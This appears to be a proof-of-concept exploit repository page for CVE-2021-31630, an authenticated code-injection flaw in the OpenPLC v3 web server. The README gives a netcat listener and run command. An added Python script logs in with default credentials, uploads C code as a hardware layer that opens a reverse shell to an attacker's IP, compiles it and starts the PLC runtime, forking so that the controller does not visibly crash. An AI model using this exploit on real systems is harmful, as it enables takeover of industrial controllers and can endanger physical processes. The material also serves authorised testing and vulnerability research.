
CVE-2021-31630 PoC: OpenPLC Code Injection Vulnerability

Associated Vulnerability
Title: OpenPLC Code Injection Vulnerability (CVE-2021-31630)
Description: OpenPLC is an open-source programmable logic controller that provides a low-cost industrial solution for automation and research. OpenPLC v3 contains a code injection vulnerability: the Hardware Layer Code Box component of the /hardware page in the product's web service does not filter special characters in its input. An authenticated attacker can exploit this to execute system commands on the host.
Readme
# OpenPLC v3 Authenticated RCE (CVE-2021-31630)

This is a modern Python 3.13+ compatible proof-of-concept exploit for CVE-2021-31630, a vulnerability in OpenPLC v3 that allows an authenticated user to upload a custom hardware layer containing malicious code. The server compiles that code into the PLC runtime, leading to remote code execution (RCE) on the host.

Original vulnerability discovery and advisory by Fellipe Oliveira.
This reimplementation and modernization uses httpx, CLI tooling, logging, and a detection check that compiles a harmless layer without executing it.

## Exploit Overview
- Vulnerability: CVE-2021-31630
- Component: OpenPLC v3 Web Server
- Impact: Authenticated Remote Code Execution
- Default Credentials: openplc:openplc

## Exploit Flow
1. Login using valid credentials
2. Upload malicious C code as a custom hardware layer
3. Trigger compilation
4. Trigger execution by starting the PLC runtime (optional: skip this to confirm compilation only, without running the payload)
5. Receive reverse shell connection

## Usage
1. Start a listener:
```
nc -lvnp 9001
```
2. Run the exploit:
```
python3 OpenPLC_CVE_2021_31630.py http://target:8080 -lh YOUR_IP -lp 9001
```
Optional flags:
- -u Username (default: openplc)
- -p Password (default: openplc)
- -t Timeout in seconds (default: 20)

### Features
- [x] Compatible with Python 3.13+
- [x] Built with httpx 
- [x] Logging support for clean output
- [x] Modular functions for easier reuse
- [x] Nuclei detection templates included 

## Nuclei Detection Templates 
1. Default Credentials Check
```
nuclei -t nuclei-templates/openplc-default-login.yaml -u http://target:8080
```
2. Non-executing RCE Vulnerability Check
```
nuclei -t nuclei-templates/openplc-authenticated-rce-check.yaml -u http://target:8080
```
The second template logs in and attempts a harmless payload upload + compilation to confirm likely vulnerability, without triggering actual code execution. Note that it is not passive: it replaces the target's configured custom hardware layer and triggers a rebuild, so run it only against systems where that change is acceptable.
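The flow listed under "Exploit Flow" and the harmless compile-only check behind the second template, as one added worked example (this is not the PoC script or the templates in this repository). Endpoint paths and form field names (/login with username/password, /hardware with hardware_layer and custom_layer_code, /compile-program?file=..., /compilation-logs, /start_run) and the four hardware-layer entry points are assumptions taken from the OpenPLC v3 webserver and its blank layer template; verify them against the target version. The target URL, program file name, lhost and lport are placeholders.

```python
"""Added example: build an OpenPLC hardware-layer payload and drive the
login -> upload -> compile -> (start) flow with httpx.  Endpoint paths and
form fields are ASSUMED from OpenPLC v3's Flask webserver; verify them."""
import ipaddress
import sys
import time
from dataclasses import dataclass

# Entry points assumed to match OpenPLC v3's blank hardware layer; the runtime
# calls initializeHardware() once when the PLC is started, so that is where a
# payload executes.  Verify against the target's bundled hardware layers.
_LAYER_TEMPLATE = """\
#include "ladder.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

void initializeHardware()
{{
{init_body}
}}
void finalizeHardware() {{}}
void updateBuffersIn() {{}}
void updateBuffersOut() {{}}
"""


def build_benign_layer(marker: str = "openplc-check") -> str:
    """Layer that compiles cleanly and does nothing: the 'harmless upload +
    compilation' check.  It still replaces the target's custom layer."""
    return _LAYER_TEMPLATE.format(
        init_body=f"    /* {marker}: benign hardware layer, no side effects */")


def build_reverse_shell_layer(lhost: str, lport: int) -> str:
    """Layer whose initializeHardware() forks, connects back to lhost:lport and
    execs /bin/sh with stdio on the socket.  Runs as the runtime's user."""
    ipaddress.ip_address(lhost)  # only a literal IP goes into the C source
    if not 1 <= lport <= 65535:
        raise ValueError("port out of range")
    body = f"""\
    int s = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in sa;
    memset(&sa, 0, sizeof(sa));
    sa.sin_family = AF_INET;
    sa.sin_port = htons({lport});
    sa.sin_addr.s_addr = inet_addr("{lhost}");
    if (s < 0 || connect(s, (struct sockaddr *)&sa, sizeof(sa)) != 0) return;
    if (fork() != 0) return;             /* parent keeps the PLC runtime alive */
    dup2(s, 0); dup2(s, 1); dup2(s, 2);
    char *argv[] = {{"/bin/sh", NULL}};
    execve("/bin/sh", argv, NULL);"""
    return _LAYER_TEMPLATE.format(init_body=body)


def login_succeeded(status: int, headers: dict, body: str) -> bool:
    """Assumed webserver behaviour: success redirects away from /login,
    failure re-renders the login form (HTTP 200 with an error message)."""
    location = {k.lower(): v for k, v in headers.items()}.get("location", "")
    return status in (301, 302, 303) and "login" not in location


@dataclass
class Target:
    base_url: str                 # placeholder, e.g. http://target:8080
    program_file: str             # an .st program already present on the target
    username: str = "openplc"     # default credentials per the README
    password: str = "openplc"
    timeout: float = 20.0


def run_flow(t: Target, layer_code: str, start_runtime: bool) -> bool:
    import httpx  # imported here so the pure helpers above need no dependency
    with httpx.Client(base_url=t.base_url, timeout=t.timeout,
                      follow_redirects=False) as c:
        r = c.post("/login", data={"username": t.username, "password": t.password})
        if not login_succeeded(r.status_code, dict(r.headers), r.text):
            return False                                             # step 1
        c.post("/hardware", data={"hardware_layer": "blank_linux",
                                  "custom_layer_code": layer_code})  # step 2
        c.get("/compile-program", params={"file": t.program_file})   # step 3
        for _ in range(int(t.timeout)):    # build runs in the background (assumed)
            log = c.get("/compilation-logs").text.lower()
            if "finished" in log or "error" in log:
                break
            time.sleep(1)
        if start_runtime:
            c.get("/start_run")                                      # step 4
        return True


if __name__ == "__main__":
    # usage: python3 this.py http://target:8080 program.st [LHOST LPORT]
    url, prog, *cb = sys.argv[1:]
    layer = build_reverse_shell_layer(cb[0], int(cb[1])) if cb else build_benign_layer()
    ok = run_flow(Target(url, prog), layer, start_runtime=bool(cb))
    print("flow completed" if ok else "login failed")
```

Without LHOST/LPORT the script performs the compile-only check with the benign layer and never starts the runtime; with them it uploads the connect-back layer and starts the PLC, which is when initializeHardware() runs. The fork() in the payload keeps the runtime process alive so the PLC does not visibly crash when the shell exits.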

## Included Files
- OpenPLC_CVE_2021_31630.py – Python 3.13+ exploit
- nuclei-templates/openplc-default-login.yaml – Detect default creds
- nuclei-templates/openplc-authenticated-rce-check.yaml – Detect vulnerable behavior safely
 
## ⚠️ Legal / Ethics

This code is for educational and authorized security testing only.
Do not use without explicit permission from the system owner.
File Snapshot

```
/data/pocs/677e5361e6f961d6155bec4d406f753650cfe65b
├── nuclei-templates
│   ├── openplc-authenticated-rce-check.yaml  (1.2K)
│   └── openplc-default-login.yaml            (802)
├── OpenPLC_CVE_2021_31630.py                 (5.3K)
└── README.md                                 (2.1K)

1 directory, 4 files
```